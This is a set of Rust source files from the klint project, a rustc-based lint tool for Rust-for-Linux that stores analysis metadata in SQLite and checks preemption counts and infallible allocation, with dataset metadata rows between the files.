continue;
}
let klint_path = path.with_extension("klint");
if !klint_path.exists() {
continue;
}
let conn = Connection::open_with_flags(
&klint_path,
rusqlite::OpenFlags::SQLITE_OPEN_READ_ONLY,
)
.unwrap();
// Check the schema version matches the current version
let mut schema_ver = 0;
conn.pragma_query(None, "user_version", |r| {
schema_ver = r.get::<_, u32>(0)?;
Ok(())
})
.unwrap();
if schema_ver != SCHEMA_VERSION {
info!(
"schema version of {} mismatch, ignoring",
klint_path.display()
);
}
result = Some(Arc::new(MTLock::new(conn)));
break;
}
// If we're running with pre-built sysroot, none of the these will be available to klint.
// In such cases, stop emitting too much warnings.
if result.is_none() && !sysroot {
let name = self.tcx.crate_name(cnum);
warn!("no klint metadata found for crate {}", name);
}
guard.insert(cnum, result.clone());
result
}
pub(crate) fn sql_create_table<Q: Query>(&self) {
self.local_conn
.lock()
.execute_batch(&format!(
"CREATE TABLE {} (key BLOB PRIMARY KEY, value BLOB);",
Q::NAME
))
.unwrap();
}
pub(crate) fn sql_load_with_span<Q: PersistentQuery>(
&self,
key: Q::Key<'tcx>,
span: Span,
) -> Option<Q::Value<'tcx>> {
let (cnum, local_key) = Q::into_crate_and_local(key);
let mut encode_ctx = crate::serde::EncodeContext::new(self.tcx, span);
local_key.encode(&mut encode_ctx);
let encoded = encode_ctx.finish();
let value_encoded: Vec<u8> = self
.sql_connection(cnum)?
.lock()
.query_row(
&format!("SELECT value FROM {} WHERE key = ?", Q::NAME),
rusqlite::params![encoded],
|row| row.get(0),
)
.optional()
.unwrap()?;
let mut decode_ctx = crate::serde::DecodeContext::new(self.tcx, &value_encoded, span);
let value = Q::decode_value(&mut decode_ctx);
Some(value)
}
pub(crate) fn sql_load<Q: PersistentQuery>(&self, key: Q::Key<'tcx>) -> Option<Q::Value<'tcx>> {
self.sql_load_with_span::<Q>(key, DUMMY_SP)
}
pub(crate) fn sql_store_with_span<Q: PersistentQuery>(
&self,
key: Q::Key<'tcx>,
value: Q::Value<'tcx>,
span: Span,
) {
let (cnum, local_key) = Q::into_crate_and_local(key);
assert!(cnum == LOCAL_CRATE);
// Avoid serialising anything if there are errors (to prevent errors from being encoded
// which can cause panic).
if self.dcx().has_errors().is_some() {
return;
}
let mut encode_ctx = crate::serde::EncodeContext::new(self.tcx, span);
local_key.encode(&mut encode_ctx);
let key_encoded = encode_ctx.finish();
let mut encode_ctx = crate::serde::EncodeContext::new(self.tcx, span);
Q::encode_value(&value, &mut encode_ctx);
let value_encoded = encode_ctx.finish();
self.local_conn
.lock()
.execute(
&format!(
"INSERT OR REPLACE INTO {} (key, value) VALUES (?, ?)",
Q::NAME
),
rusqlite::params![key_encoded, value_encoded],
)
.unwrap();
}
pub(crate) fn sql_store<Q: PersistentQuery>(&self, key: Q::Key<'tcx>, value: Q::Value<'tcx>) {
self.sql_store_with_span::<Q>(key, value, DUMMY_SP);
}
pub fn new(tcx: TyCtxt<'tcx>) -> Self {
let output_filenames = tcx.output_filenames(());
// FIXME: This makes sure that we can find the correct name for .so files
// used for proc macros. But this is quite hacky.
let preferred_output = if output_filenames
.outputs
.contains_explicit_name(&OutputType::Exe)
{
OutputType::Exe
} else {
OutputType::Metadata
};
let output_path = output_filenames.path(preferred_output);
let output_path = output_path.as_path();
let klint_out = output_path.with_extension("klint");
let _ = std::fs::remove_file(&klint_out);
let conn = Connection::open(&klint_out).unwrap();
// Check the schema version matches the current version
let mut schema_ver = 0;
conn.pragma_query(None, "user_version", |r| {
schema_ver = r.get::<_, u32>(0)?;
Ok(())
})
.unwrap();
conn.execute("begin immediate", ()).unwrap();
conn.pragma_update(None, "user_version", SCHEMA_VERSION)
.unwrap();
let ret = Self {
tcx,
local_conn: MTLock::new(conn),
sql_conn: Default::default(),
call_stack: Default::default(),
query_cache: Default::default(),
};
ret.sql_create_table::<crate::preempt_count::annotation::preemption_count_annotation>();
ret.sql_create_table::<crate::preempt_count::annotation::drop_preemption_count_annotation>(
);
ret.sql_create_table::<crate::preempt_count::adjustment::instance_adjustment>();
ret.sql_create_table::<crate::preempt_count::expectation::instance_expectation>();
ret.sql_create_table::<crate::mir::analysis_mir>();
ret.sql_create_table::<crate::diagnostic_items::klint_diagnostic_items>();
ret
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/util.rs | src/util.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use rustc_hir::def_id::DefId;
use rustc_lint::LateContext;
use rustc_middle::ty::TypeVisitableExt;
pub fn fn_has_unsatisfiable_preds(cx: &LateContext<'_>, did: DefId) -> bool {
use rustc_trait_selection::traits;
let predicates = cx
.tcx
.predicates_of(did)
.predicates
.iter()
.filter_map(|(p, _)| if p.is_global() { Some(*p) } else { None });
traits::impossible_predicates(
cx.tcx,
traits::elaborate(cx.tcx, predicates).collect::<Vec<_>>(),
)
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/main.rs | src/main.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
#![feature(rustc_private)]
#![feature(box_patterns)]
#![feature(if_let_guard)]
#![feature(never_type)]
#![feature(try_blocks)]
// Used in monomorphize collector
#![feature(impl_trait_in_assoc_type)]
#![feature(once_cell_get_mut)]
// Used in symbol.rs
#![feature(macro_metavar_expr)]
#![feature(unsize)]
#![warn(rustc::internal)]
#[macro_use]
extern crate rustc_macros;
#[macro_use]
extern crate rustc_middle;
#[macro_use]
extern crate tracing;
extern crate itertools;
extern crate rustc_abi;
extern crate rustc_ast;
extern crate rustc_codegen_ssa;
extern crate rustc_data_structures;
extern crate rustc_driver;
extern crate rustc_errors;
extern crate rustc_fluent_macro;
extern crate rustc_hir;
extern crate rustc_index;
extern crate rustc_infer;
extern crate rustc_interface;
extern crate rustc_lint;
extern crate rustc_log;
extern crate rustc_metadata;
extern crate rustc_mir_dataflow;
extern crate rustc_monomorphize;
extern crate rustc_serialize;
extern crate rustc_session;
extern crate rustc_span;
extern crate rustc_target;
extern crate rustc_trait_selection;
extern crate thiserror;
use rustc_driver::Callbacks;
use rustc_interface::interface::Config;
use rustc_middle::ty::TyCtxt;
use rustc_session::EarlyDiagCtxt;
use rustc_session::config::{ErrorOutputType, OutputType};
use std::sync::atomic::Ordering;
use crate::ctxt::AnalysisCtxt;
#[macro_use]
mod ctxt;
mod atomic_context;
mod attribute;
mod binary_analysis;
mod diagnostic;
mod diagnostic_items;
mod driver;
mod infallible_allocation;
mod lattice;
mod mir;
mod monomorphize_collector;
mod preempt_count;
mod serde;
mod symbol;
mod util;
mod utils;
rustc_session::declare_tool_lint! {
pub klint::INCORRECT_ATTRIBUTE,
Forbid,
"Incorrect usage of klint attributes"
}
struct MyCallbacks;
impl Callbacks for MyCallbacks {
fn config(&mut self, config: &mut Config) {
config.locale_resources.push(crate::DEFAULT_LOCALE_RESOURCE);
config.extra_symbols = crate::symbol::EXTRA_SYMBOLS.to_owned();
config.override_queries = Some(|_, provider| {
// Calling `optimized_mir` will steal the result of query `mir_drops_elaborated_and_const_checked`,
// so hijack `optimized_mir` to run `analysis_mir` first.
hook_query!(provider.optimized_mir => |tcx, local_def_id, original| {
let def_id = local_def_id.to_def_id();
// Skip `analysis_mir` call if this is a constructor, since it will be delegated back to
// `optimized_mir` for building ADT constructor shim.
if !tcx.is_constructor(def_id) {
let cx = crate::driver::cx::<MyCallbacks>(tcx);
let _ = cx.analysis_mir(def_id);
}
original(tcx, local_def_id)
});
});
config.register_lints = Some(Box::new(move |_, lint_store| {
lint_store.register_lints(&[
INCORRECT_ATTRIBUTE,
infallible_allocation::INFALLIBLE_ALLOCATION,
atomic_context::ATOMIC_CONTEXT,
binary_analysis::stack_size::STACK_FRAME_TOO_LARGE,
]);
// lint_store
// .register_late_pass(|_| Box::new(infallible_allocation::InfallibleAllocation));
#[cfg(feature = "preempt_count")]
lint_store.register_late_pass(|tcx| {
Box::new(atomic_context::AtomicContext {
cx: driver::cx::<MyCallbacks>(tcx),
})
});
}));
}
fn after_analysis<'tcx>(
&mut self,
_compiler: &rustc_interface::interface::Compiler,
tcx: TyCtxt<'tcx>,
) -> rustc_driver::Compilation {
let cx = driver::cx::<MyCallbacks>(tcx);
// Ensure this query is run at least once, even without diagnostics emission, to
// catch duplicate item errors.
let _ = cx.klint_all_diagnostic_items();
rustc_driver::Compilation::Continue
}
}
impl driver::CallbacksExt for MyCallbacks {
type ExtCtxt<'tcx> = AnalysisCtxt<'tcx>;
fn ext_cx<'tcx>(&mut self, tcx: TyCtxt<'tcx>) -> Self::ExtCtxt<'tcx> {
AnalysisCtxt::new(tcx)
}
fn after_codegen<'tcx>(&mut self, cx: &'tcx AnalysisCtxt<'tcx>) {
let outputs = cx.output_filenames(());
if outputs.outputs.contains_key(&OutputType::Object) {
binary_analysis::binary_analysis(cx, outputs.path(OutputType::Object).as_path());
}
}
}
fn main() {
let handler = EarlyDiagCtxt::new(ErrorOutputType::default());
rustc_driver::init_logger(&handler, rustc_log::LoggerConfig::from_env("KLINT_LOG"));
let args: Vec<_> = std::env::args().collect();
driver::run_compiler(&args, MyCallbacks);
}
rustc_fluent_macro::fluent_messages! { "./messages.ftl" }
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/driver.rs | src/driver.rs | //! Contains hacks that changes the flow of compiler.
use std::any::Any;
use std::sync::{Arc, LazyLock, Mutex};
use rustc_codegen_ssa::traits::CodegenBackend;
use rustc_codegen_ssa::{CodegenResults, TargetConfig};
use rustc_data_structures::fx::{FxHashMap, FxIndexMap};
use rustc_data_structures::sync::{DynSend, DynSync};
use rustc_driver::{Callbacks, Compilation};
use rustc_interface::Config;
use rustc_interface::interface::Compiler;
use rustc_metadata::EncodedMetadata;
use rustc_metadata::creader::MetadataLoaderDyn;
use rustc_middle::dep_graph::{WorkProduct, WorkProductId};
use rustc_middle::ty::TyCtxt;
use rustc_middle::util::Providers;
use rustc_session::config::{Options, OutputFilenames, PrintRequest};
use rustc_session::{EarlyDiagCtxt, Session};
pub trait CallbacksExt: Callbacks + Send + 'static {
type ExtCtxt<'tcx>: DynSend + DynSync;
/// Create a new context that extends `TyCtxt`.
fn ext_cx<'tcx>(&mut self, _tcx: TyCtxt<'tcx>) -> Self::ExtCtxt<'tcx>;
fn after_codegen<'tcx>(&mut self, _cx: &'tcx Self::ExtCtxt<'tcx>) {}
}
/// Mapping from `TyCtxt<'tcx>` to `Ctxt<'tcx>`.
static TCX_EXT_MAP: LazyLock<Mutex<FxHashMap<usize, Box<dyn Any + Send + Sync>>>> =
LazyLock::new(|| Mutex::new(FxHashMap::default()));
struct CallbackWrapper<C> {
callback: Arc<Mutex<C>>,
}
impl<C: CallbacksExt> Callbacks for CallbackWrapper<C> {
fn config(&mut self, config: &mut Config) {
self.callback.lock().unwrap().config(config);
let make_codegen_backend = config.make_codegen_backend.take().unwrap_or_else(|| {
Box::new(|opts: &Options, target| {
let early_dcx = EarlyDiagCtxt::new(opts.error_format);
rustc_interface::util::get_codegen_backend(
&early_dcx,
&opts.sysroot,
opts.unstable_opts.codegen_backend.as_deref(),
target,
)
})
});
// By default, Rust starts codegen with a TyCtxt, but then leaves `TyCtxt` and join
// codegen. This is useful to reduce memory consumption while building, but also means that
// we will no longer have access to `TyCtxt` when we want to lint based on the generated
// binary. We therefore hook the backend so that the whole process is done with `TyCtxt`
// still present.
let callback_clone = self.callback.clone();
config.make_codegen_backend = Some(Box::new(|opts, target| {
let codegen_backend = make_codegen_backend(opts, target);
Box::new(BackendWrapper {
backend: codegen_backend,
callback: callback_clone,
})
}));
}
fn after_crate_root_parsing(
&mut self,
compiler: &Compiler,
krate: &mut rustc_ast::Crate,
) -> Compilation {
self.callback
.lock()
.unwrap()
.after_crate_root_parsing(compiler, krate)
}
fn after_expansion<'tcx>(&mut self, compiler: &Compiler, tcx: TyCtxt<'tcx>) -> Compilation {
let mut callback = self.callback.lock().unwrap();
// This is the first opportunity that we've got a `tcx`.
// Register the extension here.
let cx = Box::new(callback.ext_cx(tcx));
// SAFETY: this is a lifetime extension needed to store it into our hashmap.
// This can be obtained by `cx` function below, which would give it a lifetime of `'tcx`.
//
// We use a hook to destroy this before `TyCtxt<'tcx>` is gone in `codegen_crate`. That is
// the very last function to execute before `TyCtxt::finish` (assuming that no providers hook into it...)
let cx_lifetime_ext: Box<C::ExtCtxt<'static>> = unsafe { std::mem::transmute(cx) };
let cx_dyn: Box<dyn Any> = cx_lifetime_ext;
// SAFETY: horrible trick to make this actually `Sync`. However this will not actually be used
// in another thread unless `TyCtxt` is `Sync` and `DynSync` is indeed `Sync`.
let cx_sync: Box<dyn Any + Send + Sync> = unsafe { std::mem::transmute(cx_dyn) };
let tcx_addr = *tcx as *const _ as usize;
TCX_EXT_MAP.lock().unwrap().insert(tcx_addr, cx_sync);
callback.after_expansion(compiler, tcx)
}
fn after_analysis<'tcx>(&mut self, compiler: &Compiler, tcx: TyCtxt<'tcx>) -> Compilation {
self.callback.lock().unwrap().after_analysis(compiler, tcx)
}
}
pub struct BackendWrapper<C> {
backend: Box<dyn CodegenBackend>,
callback: Arc<Mutex<C>>,
}
impl<C: CallbacksExt> CodegenBackend for BackendWrapper<C> {
fn locale_resource(&self) -> &'static str {
self.backend.locale_resource()
}
fn name(&self) -> &'static str {
self.backend.name()
}
fn codegen_crate<'tcx>(&self, tcx: TyCtxt<'tcx>) -> Box<dyn Any> {
let ongoing_codegen = self.backend.codegen_crate(tcx);
let outputs = tcx.output_filenames(());
let (cg, work_map) = self
.backend
.join_codegen(ongoing_codegen, tcx.sess, outputs);
// `tcx` is going to destroyed. Let's get back the copy.
let tcx_addr = *tcx as *const _ as usize;
let cx = TCX_EXT_MAP.lock().unwrap().remove(&tcx_addr).unwrap();
assert!(cx.is::<C::ExtCtxt<'static>>());
// SAFETY: we just check the (type-erased) type matches.
let cx = unsafe { Box::from_raw(Box::into_raw(cx) as *mut C::ExtCtxt<'tcx>) };
// SAFETY: one last lifetime extension just to make the signature nice.
// This is fine as `tcx` is going to be destroyed.
self.callback
.lock()
.unwrap()
.after_codegen(unsafe { &*&raw const *cx });
Box::new((cg, work_map))
}
fn join_codegen(
&self,
ongoing_codegen: Box<dyn Any>,
_sess: &Session,
_outputs: &OutputFilenames,
) -> (CodegenResults, FxIndexMap<WorkProductId, WorkProduct>) {
*ongoing_codegen.downcast().unwrap()
}
fn init(&self, sess: &Session) {
self.backend.init(sess)
}
fn print(&self, req: &PrintRequest, out: &mut String, sess: &Session) {
self.backend.print(req, out, sess)
}
fn target_config(&self, sess: &Session) -> TargetConfig {
self.backend.target_config(sess)
}
fn print_passes(&self) {
self.backend.print_passes()
}
fn print_version(&self) {
self.backend.print_version()
}
fn metadata_loader(&self) -> Box<MetadataLoaderDyn> {
self.backend.metadata_loader()
}
fn provide(&self, providers: &mut Providers) {
self.backend.provide(providers)
}
fn link(
&self,
sess: &Session,
codegen_results: CodegenResults,
metadata: EncodedMetadata,
outputs: &OutputFilenames,
) {
self.backend.link(sess, codegen_results, metadata, outputs)
}
}
pub fn run_compiler<C: CallbacksExt>(at_args: &[String], callback: C) {
rustc_driver::run_compiler(
at_args,
&mut CallbackWrapper {
callback: Arc::new(Mutex::new(callback)),
},
);
}
/// Obtain an extended context from `TyCtxt`.
pub fn cx<'tcx, C: CallbacksExt>(tcx: TyCtxt<'tcx>) -> &'tcx C::ExtCtxt<'tcx> {
let tcx_addr = *tcx as *const _ as usize;
let guard = TCX_EXT_MAP.lock().unwrap();
let cx = guard.get(&tcx_addr).unwrap();
assert!(cx.is::<C::ExtCtxt<'static>>());
// SAFETY: we have checked that the type actually matches.
unsafe { &*(&raw const **cx as *const C::ExtCtxt<'tcx>) }
}
#[macro_export]
macro_rules! hook_query {
($provider: expr => |$tcx: ident, $query: ident, $original: ident| $content: block) => {{
static ORIGINAL: std::sync::atomic::AtomicPtr<()> =
std::sync::atomic::AtomicPtr::new(std::ptr::null_mut());
ORIGINAL.store($provider as *mut (), std::sync::atomic::Ordering::Relaxed);
$provider = |$tcx, $query| {
let ptr = ORIGINAL.load(Ordering::Relaxed);
let $original = unsafe { std::mem::transmute::<*mut (), fn(_, _) -> _>(ptr) };
// Insert a type check to ensure that the signature is indeed matching.
if false {
return $original($tcx, $query);
}
$content
};
}};
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/symbol.rs | src/symbol.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
#![allow(non_upper_case_globals)]
use rustc_span::Symbol;
use rustc_span::symbol::PREDEFINED_SYMBOLS_COUNT;
macro_rules! def {
($($name: ident,)*) => {
pub const EXTRA_SYMBOLS: &[&str] = &[$(stringify!($name),)*];
$(pub const $name: Symbol = Symbol::new(PREDEFINED_SYMBOLS_COUNT + ${index()});)*
// Use two glob imports to ensure that there're no conflicts between symbols here and predefined symbols;
const _: () = {
#[expect(unused)]
use rustc_span::sym::*;
use crate::symbol::*;
$(const _: Symbol = $name;)*
};
};
}
def! {
klint,
preempt_count,
drop_preempt_count,
report_preempt_count,
dump_mir,
adjust,
unchecked,
error,
write,
Write,
task,
wake,
wake_by_ref,
sort,
quicksort,
partition,
diagnostic_item,
any_context,
atomic_context,
atomic_context_only,
process_context,
build_error,
CONFIG_FRAME_WARN,
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/infallible_allocation.rs | src/infallible_allocation.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use rustc_data_structures::fx::{FxHashMap, FxHashSet};
use rustc_lint::{LateContext, LateLintPass, LintContext};
use rustc_middle::mir::mono::MonoItem;
use rustc_middle::ty::Instance;
use rustc_session::{declare_lint_pass, declare_tool_lint};
use rustc_span::source_map::Spanned;
use rustc_span::symbol::sym;
use crate::monomorphize_collector::MonoItemCollectionStrategy;
declare_tool_lint! {
pub klint::INFALLIBLE_ALLOCATION,
Warn,
""
}
declare_lint_pass!(InfallibleAllocation => [INFALLIBLE_ALLOCATION]);
fn is_generic_fn<'tcx>(instance: Instance<'tcx>) -> bool {
instance.args.non_erasable_generics().next().is_some()
}
impl<'tcx> LateLintPass<'tcx> for InfallibleAllocation {
fn check_crate(&mut self, cx: &LateContext<'tcx>) {
// Collect all mono items to be codegened with this crate. Discard the inline map, it does
// not contain enough information for us; we will collect them ourselves later.
//
// Use eager mode here so dead code is also linted on.
let access_map = super::monomorphize_collector::collect_crate_mono_items(
cx.tcx,
MonoItemCollectionStrategy::Eager,
)
.1;
// Build a forward and backward dependency graph with span information.
let mut forward = FxHashMap::default();
let mut backward = FxHashMap::<_, Vec<_>>::default();
access_map.for_each_item_and_its_used_items(|accessor, accessees| {
let accessor = match accessor {
MonoItem::Static(s) => Instance::mono(cx.tcx, s),
MonoItem::Fn(v) => v,
_ => return,
};
let fwd_list = forward
.entry(accessor)
.or_insert_with(|| Vec::with_capacity(accessees.len()));
let mut def_span = None;
for accessee in accessees {
let accessee_node = match accessee.node {
MonoItem::Static(s) => Instance::mono(cx.tcx, s),
MonoItem::Fn(v) => v,
_ => return,
};
// For const-evaluated items, they're collected from CTFE alloc, which does not have span
// information. Synthesize one with the accessor.
let span = if accessee.span.is_dummy() {
*def_span.get_or_insert_with(|| cx.tcx.def_span(accessor.def_id()))
} else {
accessee.span
};
fwd_list.push(Spanned {
node: accessee_node,
span,
});
backward.entry(accessee_node).or_default().push(Spanned {
node: accessor,
span,
});
}
});
// Find all fallible functions
let mut visited = FxHashSet::default();
for accessee in backward.keys() {
let name = cx.tcx.def_path_str(accessee.def_id());
// Anything (directly) called by assume_fallible is considered to be fallible.
if name.contains("assume_fallible") {
visited.insert(*accessee);
for accessor in forward.get(accessee).unwrap_or(&Vec::new()) {
visited.insert(accessor.node);
}
continue;
}
match name.as_str() {
// These are fallible allocation functions that return null ptr on failure.
"alloc::alloc::__rust_alloc"
| "alloc::alloc::__rust_alloc_zeroed"
| "alloc::alloc::__rust_realloc"
| "alloc::alloc::__rust_dealloc"
// Fallible allocation function
| "alloc::string::String::try_reserve"
| "alloc::string::String::try_reserve_exact" => {
visited.insert(*accessee);
}
_ => (),
}
}
let mut infallible = FxHashSet::default();
let mut work_queue = Vec::new();
for accessee in backward.keys() {
// Only go-through non-local-copy items.
// This allows us to not to be concerned about `len()`, `is_empty()`,
// because they are all inlineable.
if forward.contains_key(accessee) {
continue;
}
if cx.tcx.crate_name(accessee.def_id().krate) == sym::alloc {
// If this item originates from alloc crate, mark it as infallible.
// Add item to the allowlist above if there are false positives.
work_queue.push(*accessee);
}
}
// Propagate infallible property.
while let Some(work_item) = work_queue.pop() {
if visited.contains(&work_item) {
continue;
}
infallible.insert(work_item);
visited.insert(work_item);
// Stop at local items to prevent over-linting
if work_item.def_id().is_local() {
continue;
}
for accessor in backward.get(&work_item).unwrap_or(&Vec::new()) {
work_queue.push(accessor.node);
}
}
for (accessor, accessees) in forward.iter() {
// Don't report on non-local items
if !accessor.def_id().is_local() {
continue;
}
// Fast path
if !infallible.contains(accessor) {
continue;
}
for item in accessees {
let accessee = item.node;
if !accessee.def_id().is_local() && infallible.contains(&accessee) {
let is_generic = is_generic_fn(*accessor);
let generic_note = if is_generic {
format!(
" when the caller is monomorphized as `{}`",
cx.tcx
.def_path_str_with_args(accessor.def_id(), accessor.args)
)
} else {
String::new()
};
let accessee_path = cx
.tcx
.def_path_str_with_args(accessee.def_id(), accessee.args);
cx.span_lint(INFALLIBLE_ALLOCATION, item.span, |diag| {
diag.primary_message(format!(
"`{}` can perform infallible allocation{}",
accessee_path, generic_note
));
// For generic functions try to display a stacktrace until a non-generic one.
let mut caller = *accessor;
let mut visited = FxHashSet::default();
visited.insert(*accessor);
visited.insert(accessee);
while is_generic_fn(caller) {
let spanned_caller = match backward
.get(&caller)
.map(|x| &**x)
.unwrap_or(&[])
.iter()
.find(|x| !visited.contains(&x.node))
{
Some(v) => *v,
None => break,
};
caller = spanned_caller.node;
visited.insert(caller);
diag.span_note(
spanned_caller.span,
format!(
"which is called from `{}`",
cx.tcx.def_path_str_with_args(caller.def_id(), caller.args)
),
);
}
// Generate some help messages for why the function is determined to be infallible.
let mut msg: &str = &format!(
"`{}` is determined to be infallible because it",
accessee_path
);
let mut callee = accessee;
loop {
let callee_callee = match forward
.get(&callee)
.map(|x| &**x)
.unwrap_or(&[])
.iter()
.find(|x| {
infallible.contains(&x.node) && !visited.contains(&x.node)
}) {
Some(v) => v,
None => break,
};
callee = callee_callee.node;
visited.insert(callee);
diag.span_note(
callee_callee.span,
format!(
"{} calls into `{}`",
msg,
cx.tcx.def_path_str_with_args(callee.def_id(), callee.args)
),
);
msg = "which";
}
diag.note(format!("{} may call alloc_error_handler", msg));
});
}
}
}
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
Rust-for-Linux/klint | https://github.com/Rust-for-Linux/klint/blob/2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7/src/preempt_count/dataflow.rs | src/preempt_count/dataflow.rs | // Copyright Gary Guo.
//
// SPDX-License-Identifier: MIT OR Apache-2.0
use rustc_middle::mir::{BasicBlock, Body, TerminatorEdges, TerminatorKind};
use rustc_middle::ty::{self, Instance, TypingEnv};
use rustc_mir_dataflow::JoinSemiLattice;
use rustc_mir_dataflow::lattice::FlatSet;
use rustc_mir_dataflow::{Analysis, fmt::DebugWithContext};
use super::Error;
use crate::ctxt::AnalysisCtxt;
use crate::diagnostic::use_stack::{UseSite, UseSiteKind};
/// A result type that can be used as lattice.
#[derive(Clone, Copy, PartialEq, Eq, Debug)]
pub enum MaybeError<T, E> {
Ok(T),
Err(E),
}
impl<T: Default, E> Default for MaybeError<T, E> {
fn default() -> Self {
Self::Ok(Default::default())
}
}
impl<T, E> From<Result<T, E>> for MaybeError<T, E> {
#[inline]
fn from(value: Result<T, E>) -> Self {
match value {
Ok(v) => Self::Ok(v),
Err(e) => Self::Err(e),
}
}
}
impl<T, E> From<MaybeError<T, E>> for Result<T, E> {
#[inline]
fn from(value: MaybeError<T, E>) -> Self {
match value {
MaybeError::Ok(v) => Ok(v),
MaybeError::Err(e) => Err(e),
}
}
}
impl<T, E> MaybeError<T, E> {
#[inline]
pub fn from_result(result: Result<T, E>) -> Self {
result.into()
}
#[inline]
pub fn into_result(self) -> Result<T, E> {
self.into()
}
#[inline]
#[track_caller]
pub fn unwrap(self) -> T
where
E: std::fmt::Debug,
{
self.into_result().unwrap()
}
}
// The error type is hard coded to `Error` because we need special treatment w.r.t. `TooGeneric`.
impl<T: JoinSemiLattice> JoinSemiLattice for MaybeError<T, Error> {
fn join(&mut self, other: &Self) -> bool {
match (self, other) {
(Self::Err(Error::Error(_)), _) => false,
(this, Self::Err(Error::Error(e))) => {
*this = Self::Err(Error::Error(*e));
true
}
(Self::Err(Error::TooGeneric), _) => false,
(this, Self::Err(Error::TooGeneric)) => {
*this = Self::Err(Error::TooGeneric);
true
}
(Self::Ok(a), Self::Ok(b)) => a.join(b),
}
}
}
pub struct AdjustmentComputation<'mir, 'tcx, 'checker> {
pub checker: &'checker AnalysisCtxt<'tcx>,
pub body: &'mir Body<'tcx>,
pub typing_env: TypingEnv<'tcx>,
pub instance: Instance<'tcx>,
}
impl DebugWithContext<AdjustmentComputation<'_, '_, '_>> for MaybeError<FlatSet<i32>, Error> {}
impl<'tcx> Analysis<'tcx> for AdjustmentComputation<'_, 'tcx, '_> {
// The number here indicates the offset in relation to the function's entry point.
type Domain = MaybeError<FlatSet<i32>, Error>;
const NAME: &'static str = "atomic context";
fn bottom_value(&self, _body: &Body<'tcx>) -> Self::Domain {
MaybeError::Ok(FlatSet::Bottom)
}
fn initialize_start_block(&self, _body: &Body<'tcx>, state: &mut Self::Domain) {
*state = MaybeError::Ok(FlatSet::Elem(0));
}
fn apply_primary_statement_effect(
&self,
_state: &mut Self::Domain,
_statement: &rustc_middle::mir::Statement<'tcx>,
_location: rustc_middle::mir::Location,
) {
}
fn apply_primary_terminator_effect<'mir>(
&self,
state: &mut Self::Domain,
terminator: &'mir rustc_middle::mir::Terminator<'tcx>,
location: rustc_middle::mir::Location,
) -> TerminatorEdges<'mir, 'tcx> {
// Skip all unwinding paths.
if self.body.basic_blocks[location.block].is_cleanup {
return terminator.edges();
}
let MaybeError::Ok(bounds) = state else {
return terminator.edges();
};
let adjustment = match &terminator.kind {
TerminatorKind::Call { func, .. } => {
let callee_ty = func.ty(self.body, self.checker.tcx);
let callee_ty = self.instance.instantiate_mir_and_normalize_erasing_regions(
self.checker.tcx,
self.typing_env,
ty::EarlyBinder::bind(callee_ty),
);
if let ty::FnDef(def_id, args) = *callee_ty.kind() {
if let Some(v) = self.checker.preemption_count_annotation(def_id).adjustment {
// Fast path, no need to resolve the instance.
// This also avoids `TooGeneric` when def_id is an trait method.
Ok(v)
} else {
match ty::Instance::try_resolve(
self.checker.tcx,
self.typing_env,
def_id,
args,
)
.unwrap()
{
Some(instance) => {
self.checker.call_stack.borrow_mut().push(UseSite {
instance: self.typing_env.as_query_input(self.instance),
kind: UseSiteKind::Call(terminator.source_info.span),
});
let result = self
.checker
.instance_adjustment(self.typing_env.as_query_input(instance));
self.checker.call_stack.borrow_mut().pop();
result
}
None => Err(Error::TooGeneric),
}
}
} else {
Ok(crate::atomic_context::INDIRECT_DEFAULT.0)
}
}
TerminatorKind::Drop { place, .. } => {
let ty = place.ty(self.body, self.checker.tcx).ty;
let ty = self.instance.instantiate_mir_and_normalize_erasing_regions(
self.checker.tcx,
self.typing_env,
ty::EarlyBinder::bind(ty),
);
self.checker.call_stack.borrow_mut().push(UseSite {
instance: self.typing_env.as_query_input(self.instance),
kind: UseSiteKind::Drop {
drop_span: terminator.source_info.span,
place_span: self.body.local_decls[place.local].source_info.span,
},
});
let result = self
.checker
.drop_adjustment(self.typing_env.as_query_input(ty));
self.checker.call_stack.borrow_mut().pop();
result
}
_ => return terminator.edges(),
};
let adjustment = match adjustment {
Ok(v) => v,
Err(e) => {
// Too generic, need to bail out and retry after monomorphization.
*state = MaybeError::Err(e);
return terminator.edges();
}
};
*bounds = match *bounds {
FlatSet::Bottom => unreachable!(),
FlatSet::Elem(v) => FlatSet::Elem(v + adjustment),
FlatSet::Top => FlatSet::Top,
};
terminator.edges()
}
fn apply_call_return_effect(
&self,
_state: &mut Self::Domain,
_block: BasicBlock,
_return_places: rustc_middle::mir::CallReturnPlaces<'_, 'tcx>,
) {
}
}
| rust | Apache-2.0 | 2651b747c68a5fefc0ff72f3b2a9395e1c75dcd7 | 2026-01-04T20:21:44.735699Z | false |
